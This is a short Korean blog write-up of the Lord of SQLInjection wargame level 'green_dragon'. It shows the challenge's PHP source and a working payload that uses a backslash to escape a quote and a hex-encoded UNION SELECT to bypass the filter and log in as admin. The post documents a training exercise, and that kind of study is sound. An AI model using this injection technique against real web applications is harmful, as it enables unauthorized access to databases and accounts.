
[ LOS ] Lord of SQLInjection 25번 풀이(green_dragon)
sangjun
·2022. 1. 13. 23:30
반응형
문제소스
query : select id,pw from prob_green_dragon where id='' and pw=''
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']){
if(preg_match('/prob|_|\.|\'|\"/i', $result['id'])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $result['pw'])) exit("No Hack ~_~");
$query2 = "select id from prob_green_dragon where id='{$result[id]}' and pw='{$result[pw]}'";
echo "<hr>query2 : <strong>{$query2}</strong><hr><br>";
$result = mysqli_fetch_array(mysqli_query($db,$query2));
if($result['id'] == "admin") solve("green_dragon");
}
highlight_file(__FILE__);
?>
문제 분석 및 페이로드
1. \로 pw='까지 id로 처리 한 다음에 union select로 페이로드 전달
?id=\&pw=union%20select%200x5c,0x756e696f6e2073656c6563742030783631363436643639366523%23
2. 비상비상 난이도 급 상승..
반응형
'War Games > Lord of sql injection (LOS)' 카테고리의 다른 글
[ LOS ] Lord of SQLInjection 27번 풀이(blue_dragon) (0) | 2022.01.14 |
---|---|
[ LOS ] Lord of SQLInjection 26번 풀이(red_dragon) (0) | 2022.01.14 |
[ LOS ] Lord of SQLInjection 25번 풀이(green_dragon) (0) | 2022.01.13 |
[ LOS ] Lord of SQLInjection 24번 풀이(evil_wizard) (0) | 2022.01.13 |
[ LOS ] Lord of SQLInjection 23번 풀이(hell_fire) (0) | 2022.01.12 |
[ LOS ] Lord of SQLInjection 22번 풀이(dark_eyes) (2) | 2022.01.12 |
0개의 댓글